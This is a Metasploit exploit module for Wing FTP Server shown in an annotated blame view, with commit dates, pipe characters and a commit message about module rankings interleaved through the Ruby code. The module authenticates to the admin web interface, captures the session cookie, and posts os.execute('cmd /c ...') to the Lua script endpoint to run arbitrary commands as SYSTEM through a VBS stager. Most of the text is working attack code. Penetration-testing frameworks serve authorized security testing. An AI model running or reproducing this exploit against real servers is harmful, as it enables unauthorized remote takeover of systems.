2014-08-26 14:28:41 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2014-08-26 14:28:41 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
Add more ranks, remove module warnings
../vmware_mount.rb
Rank = Excellent
Exploit uses check code for target availability,
the vulnerability does not require user action,
and the exploit uses privilege escalation to run
arbitrary executables
../movabletype_upgrade_exec.rb
Rank = ExcellentRanking
Exploit utilizes code injection,
has a check for availability
../uptime_file_upload_2.rb
Rank = ExcellentRanking
Exploit allows execution of arbitrary commands,
has a check for availability
../zpanel_information_disclosure_rce.rb
Rank = ExcellentRanking
Exploit allows remote code execution,
implements version check for pChart
../spip_connect_exec.rb
Rank = ExcellentRanking
Exploit utilizes code injection,
has a check for availability
../wp_optimizepress_upload.rb
Rank = ExcellentRanking
Exploit allows execution of arbitrary code,
has a check for availability
../wing_ftp_admin_exec.rb
Rank = ExcellentRanking
Exploit allows execution of arbitrary commands,
has a check for availability
../novell_mdm_lfi.rb
Rank = ExcellentRanking
Exploit allows execution of arbitrary code,
has a check for availability
../run_as.rb
Rank = ExcellentRanking
Exploit utilizes command injection,
checks system type, and does not require user action
2017-05-03 15:12:55 +00:00
|
|
|
Rank = ExcellentRanking
|
2014-08-26 14:28:41 +00:00
|
|
|
include Msf::Exploit::CmdStager
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2014-08-29 17:42:11 +00:00
|
|
|
'Name' => 'Wing FTP Server Authenticated Command Execution',
|
2014-08-26 14:28:41 +00:00
|
|
|
'Description' => %q{
|
2014-08-29 17:42:11 +00:00
|
|
|
This module exploits the embedded Lua interpreter in the admin web interface for
|
2014-08-26 14:28:41 +00:00
|
|
|
versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
|
|
|
|
an attacker can use os.execute() to execute arbitrary system commands on
|
|
|
|
the target with SYSTEM privileges.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
2014-08-29 17:42:11 +00:00
|
|
|
'Nicholas Nam <nick[at]executionflow.org>'
|
2014-08-26 14:28:41 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'http://www.wftpserver.com' ]
|
|
|
|
],
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows VBS Stager', {} ]
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'DisclosureDate' => 'Jun 19 2014',
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(5466),
|
|
|
|
OptString.new('USERNAME', [true, 'Admin username', '']),
|
|
|
|
OptString.new('PASSWORD', [true, 'Admin password', ''])
|
|
|
|
], self.class
|
|
|
|
)
|
|
|
|
deregister_options('CMDSTAGER::FLAVOR')
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => '/admin_login.html',
|
2014-08-28 17:30:30 +00:00
|
|
|
'method' => 'GET'
|
2014-08-26 14:28:41 +00:00
|
|
|
})
|
|
|
|
|
2014-08-28 17:57:52 +00:00
|
|
|
if !res
|
2014-08-28 19:09:35 +00:00
|
|
|
fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
|
2014-08-29 17:42:11 +00:00
|
|
|
elsif res.code != 200
|
2014-08-28 19:09:35 +00:00
|
|
|
fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.")
|
2014-08-29 17:42:11 +00:00
|
|
|
elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
|
2014-08-26 14:28:41 +00:00
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
end
|
|
|
|
|
2014-08-29 17:42:11 +00:00
|
|
|
Exploit::CheckCode::Safe
|
2014-08-26 14:28:41 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
username = datastore['USERNAME']
|
|
|
|
password = datastore['PASSWORD']
|
|
|
|
@session_cookie = authenticate(username, password)
|
|
|
|
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Sending payload")
|
2014-08-26 14:28:41 +00:00
|
|
|
# Execute the cmdstager, max length of the commands is ~1500
|
2014-08-29 17:42:11 +00:00
|
|
|
execute_cmdstager(flavor: :vbs, linemax: 1500)
|
2014-08-26 14:28:41 +00:00
|
|
|
end
|
|
|
|
|
2014-08-29 17:42:11 +00:00
|
|
|
def execute_command(cmd, _opts = {})
|
2014-08-26 14:28:41 +00:00
|
|
|
command = "os.execute('cmd /c #{cmd}')"
|
|
|
|
|
2014-08-29 17:42:11 +00:00
|
|
|
res = send_request_cgi(
|
2014-08-26 14:28:41 +00:00
|
|
|
'uri' => '/admin_lua_script.html',
|
|
|
|
'method' => 'POST',
|
|
|
|
'cookie' => @session_cookie,
|
|
|
|
'vars_post' => { 'command' => command }
|
2014-08-29 17:42:11 +00:00
|
|
|
)
|
2014-08-26 14:28:41 +00:00
|
|
|
|
2014-08-29 17:42:11 +00:00
|
|
|
if res && res.code != 200
|
2015-04-16 20:04:11 +00:00
|
|
|
fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
|
2014-08-26 14:28:41 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def authenticate(username, password)
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Authenticating")
|
2014-08-29 17:42:11 +00:00
|
|
|
res = send_request_cgi(
|
2014-08-26 14:28:41 +00:00
|
|
|
'uri' => '/admin_loginok.html',
|
|
|
|
'method' => 'POST',
|
|
|
|
'vars_post' => {
|
|
|
|
'username' => username,
|
|
|
|
'password' => password,
|
|
|
|
'username_val' => username,
|
|
|
|
'password_val' => password,
|
|
|
|
'submit_btn' => '+Login+'
|
|
|
|
}
|
2014-08-29 17:42:11 +00:00
|
|
|
)
|
2014-08-26 14:28:41 +00:00
|
|
|
|
|
|
|
uidadmin = ''
|
2014-08-29 17:42:11 +00:00
|
|
|
if !res
|
2014-08-28 17:30:30 +00:00
|
|
|
fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
|
2014-08-29 17:42:11 +00:00
|
|
|
elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
|
2014-08-26 14:28:41 +00:00
|
|
|
res.get_cookies.split(';').each do |cookie|
|
|
|
|
cookie.split(',').each do |value|
|
2014-08-29 17:42:11 +00:00
|
|
|
uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/
|
2014-08-26 14:28:41 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
else
|
|
|
|
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
|
|
|
|
end
|
|
|
|
|
2014-08-29 17:42:11 +00:00
|
|
|
"UIDADMIN=#{uidadmin}"
|
2014-08-26 14:28:41 +00:00
|
|
|
end
|
|
|
|
end
|